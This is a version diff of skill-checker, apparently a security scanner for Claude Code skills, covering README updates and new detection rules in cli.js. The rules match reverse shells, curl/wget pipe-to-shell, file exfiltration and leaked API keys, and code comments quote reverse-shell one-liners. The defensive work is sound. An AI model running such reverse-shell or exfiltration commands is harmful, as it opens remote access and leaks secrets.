skill-checker 0.1.4 → 0.1.6

package/README.md

@@ -4,7 +4,7 @@ Security checker for Claude Code skills — detect injection, malicious code, an
 
 ## Features
 
-- **52 security rules** across 6 categories: structural validity, content quality, injection detection, code safety, supply chain, and resource abuse
+- **55 security rules** across 6 categories: structural validity, content quality, injection detection, code safety, supply chain, and resource abuse
 - **Scoring system**: Grade A–F with 0–100 score
 - **Dual entry**: CLI tool + PreToolUse hook for automatic interception
 - **Configurable policies**: strict / balanced / permissive approval strategies
@@ -14,7 +14,7 @@ Security checker for Claude Code skills — detect injection, malicious code, an
 
 ## Security Standard & Benchmark
 
-Skill Checker's 52 rules are aligned with established security frameworks including OWASP Top 10 for LLM Applications (2025), MITRE CWE, and MITRE ATT&CK. The tool ships with a reproducible benchmark dataset of six fixture skills covering all rule categories. This alignment is an internal mapping exercise — Skill Checker does not claim third-party certification or external audit status.
+Skill Checker's 55 rules are aligned with established security frameworks including OWASP Top 10 for LLM Applications (2025), MITRE CWE, and MITRE ATT&CK. The tool ships with a reproducible benchmark dataset of six fixture skills covering all rule categories. This alignment is an internal mapping exercise — Skill Checker does not claim third-party certification or external audit status.
 
 See [docs/SECURITY_BENCHMARK.md](docs/SECURITY_BENCHMARK.md) for the full rule mapping matrix, benchmark methodology, scoring model, and known limitations.
 
@@ -98,6 +98,28 @@ The hook is fail-closed — if the scanner is unavailable, JSON parsing fails, o
 - `jq` must be installed for JSON parsing
 - `skill-checker` must be globally installed or available via `npx`
 
+## Dependency Security Maintenance
+
+Latest dependency audit follow-up (2026-03-07):
+
+- Production dependency risk remains unaffected (`npm audit --omit=dev`: **0 vulnerabilities**).
+- Current `npm audit` still reports **5 moderate** findings in dev tooling chain (`vitest` → `vite` → `esbuild`).
+- Upgrade to `vitest@4.0.18` is **temporarily deferred** because it requires Node `^20 || ^22 || >=24`, while this project currently supports Node `>=18`.
+- Scope of impact is limited to development/test tooling and does not affect runtime package dependencies.
+- Auditable risk acceptance record: [docs/RISK_ACCEPTANCE_DEVDEPS.md](docs/RISK_ACCEPTANCE_DEVDEPS.md).
+
+Verification commands used in this review cycle:
+
+```bash
+npm run lint
+npm test
+npm run build
+npm audit --omit=dev
+npm audit
+```
+
+Next review date: **2026-04-04**.
+
 ## Scoring
 
 Base score starts at **100**. Each finding deducts points by severity:
@@ -153,7 +175,7 @@ Config is resolved in order: CLI `--config` flag → project directory (walks up
 | Structural (STRUCT) | 8 | Missing SKILL.md, invalid frontmatter, binary files |
 | Content (CONT) | 7 | Placeholder text, lorem ipsum, promotional content |
 | Injection (INJ) | 9 | Zero-width chars, prompt override, tag injection, encoded payloads |
-| Code Safety (CODE) | 12 | eval/exec, shell execution, rm -rf, obfuscation |
+| Code Safety (CODE) | 15 | eval/exec, shell execution, reverse shell, data exfiltration, API key leakage, rm -rf, obfuscation |
 | Supply Chain (SUPPLY) | 10 | Unknown MCP servers, suspicious domains, malicious hashes, typosquat |
 | Resource Abuse (RES) | 6 | Unrestricted tool access, disable safety checks, ignore project rules |
 

package/dist/cli.js

@@ -1077,6 +1077,28 @@ var ENV_ACCESS_PATTERNS = [
   /\bgetenv\s*\(/,
   /\$\{?\w*(?:KEY|TOKEN|SECRET|PASSWORD|CREDENTIAL|API_KEY)\w*\}?/i
 ];
+var REVERSE_SHELL_PATTERNS = [
+  /\/dev\/tcp\/[\w.-]+\/\d+/,
+  // bash -i >& /dev/tcp/host/port 0>&1
+  /\bnc(?:at)?\b[^\n]*\s-(?:e|c)\s+/,
+  // nc -e /bin/sh host port
+  /\bncat\b[^\n]*\s--exec\b/,
+  // ncat --exec /bin/sh host port
+  /\bsocket\.socket\s*\([^)]*\)[\s\S]*\.(?:connect|connect_ex)\s*\([^)]*\)[\s\S]*os\.dup2\s*\([^)]*\)[\s\S]*(?:subprocess\.(?:call|run|Popen)|os\.system)\s*\(/,
+  /\bphp\b[^\n]*\bfsockopen\s*\([^)]*\)[\s\S]*\b(?:exec|shell_exec|system|passthru)\s*\(/,
+  /\bperl\b[^\n]*\bSocket\b[\s\S]*\bconnect\s*\([^)]*\)[\s\S]*\bexec\s*\(/
+];
+var REMOTE_PIPELINE_EXEC_PATTERNS = [
+  /\bcurl\b[^\n|]*https?:\/\/[^\s|]+[^\n]*\|\s*(?:sh|bash|zsh|ksh|ash)\b/i,
+  /\bwget\b[^\n|]*https?:\/\/[^\s|]+[^\n]*\|\s*(?:sh|bash|zsh|ksh|ash)\b/i,
+  /\bcurl\b[^\n|]*https?:\/\/[^\s|]+[^\n]*\|\s*(?:python|python3|node)\b/i,
+  /\bwget\b[^\n|]*https?:\/\/[^\s|]+[^\n]*\|\s*(?:python|python3|node)\b/i
+];
+var DATA_EXFIL_PATTERNS = [
+  /\bcurl\b[^\n]*(?:-d|--data|--data-binary|--data-raw)\s+@(?:[^\s'"`]+|["'`][^"'`]+["'`])/i,
+  /\bcurl\b[^\n]*(?:-F|--form)\s+[^\s=]+=@(?:[^\s'"`]+|["'`][^"'`]+["'`])/i,
+  /\bwget\b[^\n]*--post-file(?:=|\s+)(?:[^\s'"`]+|["'`][^"'`]+["'`])/i
+];
 var DYNAMIC_CODE_PATTERNS = [
   /\bcompile\s*\(/,
   /\bcodegen\b/i,
@@ -1084,6 +1106,55 @@ var DYNAMIC_CODE_PATTERNS = [
   /\brequire\s*\(\s*[^"'`\s]/,
   /\b__import__\s*\(/
 ];
+var PROVIDER_CREDENTIAL_PATTERNS = [
+  {
+    pattern: /\bsk-ant-api03-[A-Za-z0-9_-]{20,}\b/,
+    title: "Anthropic API key exposure"
+  },
+  {
+    pattern: /\bsk-proj-[A-Za-z0-9_-]{20,}\b/,
+    title: "OpenAI project key exposure"
+  },
+  {
+    pattern: /\bxox[bps]-[A-Za-z0-9-]{20,}\b/,
+    title: "Slack token exposure"
+  },
+  {
+    pattern: /\bAKIA[0-9A-Z]{16}\b/,
+    title: "AWS access key exposure"
+  },
+  {
+    pattern: /\bgh[op]_[A-Za-z0-9]{20,}\b/,
+    title: "GitHub token exposure"
+  },
+  {
+    pattern: /\bgithub_pat_[A-Za-z0-9_]{20,}\b/,
+    title: "GitHub fine-grained token exposure"
+  }
+];
+var OPENAI_SK_FALLBACK_PATTERN = /\bsk-[A-Za-z0-9_-]{20,}\b/;
+var CREDENTIAL_NAME_TOKENS = /* @__PURE__ */ new Set([
+  "api",
+  "key",
+  "token",
+  "secret",
+  "password",
+  "credential"
+]);
+var CREDENTIAL_COMPOUND_NAMES = /* @__PURE__ */ new Set([
+  "apikey",
+  "apitoken",
+  "accesskey",
+  "accesstoken",
+  "secretkey",
+  "secrettoken"
+]);
+var CREDENTIAL_EQUALS_PATTERN = /\b([A-Za-z0-9_-]+)\b\s*=\s*["'`]?([A-Za-z0-9._~+/=\-]{20,})/i;
+var CREDENTIAL_KEY_VALUE_PATTERN = /^\s*["'`]?([A-Za-z0-9_-]+)["'`]?\s*:\s*["'`]?([A-Za-z0-9._~+/=\-]{20,})/i;
+var AUTHORIZATION_BEARER_PATTERN = /\bAuthorization\b\s*:\s*Bearer\s+([A-Za-z0-9._~+/=\-]{20,})/i;
+var X_API_KEY_PATTERN = /\bx-api-key\b\s*:\s*([A-Za-z0-9._~+/=\-]{20,})/i;
+var CREDENTIAL_MIN_LENGTH = 20;
+var CREDENTIAL_MIN_ENTROPY = 4.5;
 var PERMISSION_PATTERNS = [
   /\bchmod\s+[+0-9]/,
   /\bchown\b/,
@@ -1158,6 +1229,40 @@ var codeSafetyChecks = {
           source,
           codeBlockCtx: cbCtx
         });
+        checkPatterns(results, line, REVERSE_SHELL_PATTERNS, {
+          id: "CODE-014",
+          severity: "CRITICAL",
+          title: "Reverse shell pattern",
+          loc,
+          lineNum,
+          source
+        });
+        const code015 = detectCode015(line);
+        if (code015) {
+          results.push({
+            id: "CODE-015",
+            category: "CODE",
+            severity: code015.severity,
+            title: code015.title,
+            message: `At ${loc}: ${line.trim().slice(0, 120)}`,
+            line: lineNum,
+            snippet: line.trim().slice(0, 120),
+            source
+          });
+        }
+        const credentialLeak = detectCredentialLeak(line);
+        if (credentialLeak) {
+          results.push({
+            id: "CODE-013",
+            category: "CODE",
+            severity: credentialLeak.severity,
+            title: credentialLeak.title,
+            message: `At ${loc}: ${line.trim().slice(0, 120)}`,
+            line: lineNum,
+            snippet: line.trim().slice(0, 120),
+            source
+          });
+        }
         checkPatterns(results, line, DYNAMIC_CODE_PATTERNS, {
           id: "CODE-010",
           severity: "HIGH",
@@ -1213,6 +1318,97 @@ function checkPatterns(results, line, patterns, opts) {
     }
   }
 }
+function detectCode015(line) {
+  if (REMOTE_PIPELINE_EXEC_PATTERNS.some((pattern) => pattern.test(line))) {
+    return {
+      severity: "CRITICAL",
+      title: "Remote pipeline execution pattern"
+    };
+  }
+  if (DATA_EXFIL_PATTERNS.some((pattern) => pattern.test(line))) {
+    return {
+      severity: "HIGH",
+      title: "Data exfiltration pattern"
+    };
+  }
+  return null;
+}
+function detectCredentialLeak(line) {
+  for (const provider of PROVIDER_CREDENTIAL_PATTERNS) {
+    if (provider.pattern.test(line)) {
+      return {
+        severity: "CRITICAL",
+        title: provider.title
+      };
+    }
+  }
+  if (OPENAI_SK_FALLBACK_PATTERN.test(line) && isCredentialAssignmentContext(line)) {
+    return {
+      severity: "CRITICAL",
+      title: "OpenAI-style API key exposure"
+    };
+  }
+  const assignmentMatch = line.match(CREDENTIAL_EQUALS_PATTERN);
+  if (assignmentMatch?.[1] && assignmentMatch[2] && hasCredentialNameToken(assignmentMatch[1]) && isHighEntropyCredential(assignmentMatch[2])) {
+    return {
+      severity: "HIGH",
+      title: "High-entropy credential assignment"
+    };
+  }
+  const keyValueMatch = line.match(CREDENTIAL_KEY_VALUE_PATTERN);
+  if (keyValueMatch?.[1] && keyValueMatch[2] && hasCredentialNameToken(keyValueMatch[1]) && isHighEntropyCredential(keyValueMatch[2])) {
+    return {
+      severity: "HIGH",
+      title: "High-entropy credential assignment"
+    };
+  }
+  const bearerMatch = line.match(AUTHORIZATION_BEARER_PATTERN);
+  if (bearerMatch?.[1] && isHighEntropyCredential(bearerMatch[1])) {
+    return {
+      severity: "HIGH",
+      title: "Authorization bearer credential exposure"
+    };
+  }
+  const xApiKeyMatch = line.match(X_API_KEY_PATTERN);
+  if (xApiKeyMatch?.[1] && isHighEntropyCredential(xApiKeyMatch[1])) {
+    return {
+      severity: "HIGH",
+      title: "X-API-Key credential exposure"
+    };
+  }
+  return null;
+}
+function isCredentialAssignmentContext(line) {
+  if (/\bAuthorization\b\s*:\s*Bearer\s+sk-/i.test(line)) {
+    return true;
+  }
+  if (/\bx-api-key\b\s*:\s*sk-/i.test(line)) {
+    return true;
+  }
+  const equalsMatch = line.match(CREDENTIAL_EQUALS_PATTERN);
+  if (equalsMatch?.[1] && equalsMatch[2]) {
+    return hasCredentialNameToken(equalsMatch[1]) && equalsMatch[2].startsWith("sk-");
+  }
+  const keyValueMatch = line.match(CREDENTIAL_KEY_VALUE_PATTERN);
+  if (keyValueMatch?.[1] && keyValueMatch[2]) {
+    return hasCredentialNameToken(keyValueMatch[1]) && keyValueMatch[2].startsWith("sk-");
+  }
+  return false;
+}
+function hasCredentialNameToken(name) {
+  const normalized = name.replace(/([a-z])([A-Z])/g, "$1_$2").replace(/([A-Za-z])([0-9])/g, "$1_$2").replace(/([0-9])([A-Za-z])/g, "$1_$2").toLowerCase();
+  const tokens = normalized.split(/[_-]+/).map((token) => token.trim()).filter(Boolean);
+  if (tokens.some((token) => CREDENTIAL_NAME_TOKENS.has(token))) {
+    return true;
+  }
+  return tokens.length === 1 && CREDENTIAL_COMPOUND_NAMES.has(tokens[0]);
+}
+function isHighEntropyCredential(value) {
+  if (value.length < CREDENTIAL_MIN_LENGTH) {
+    return false;
+  }
+  return shannonEntropy(value) > CREDENTIAL_MIN_ENTROPY;
+}
 function getTextSources(skill) {
   const sources = [
     { text: skill.body, source: "SKILL.md" }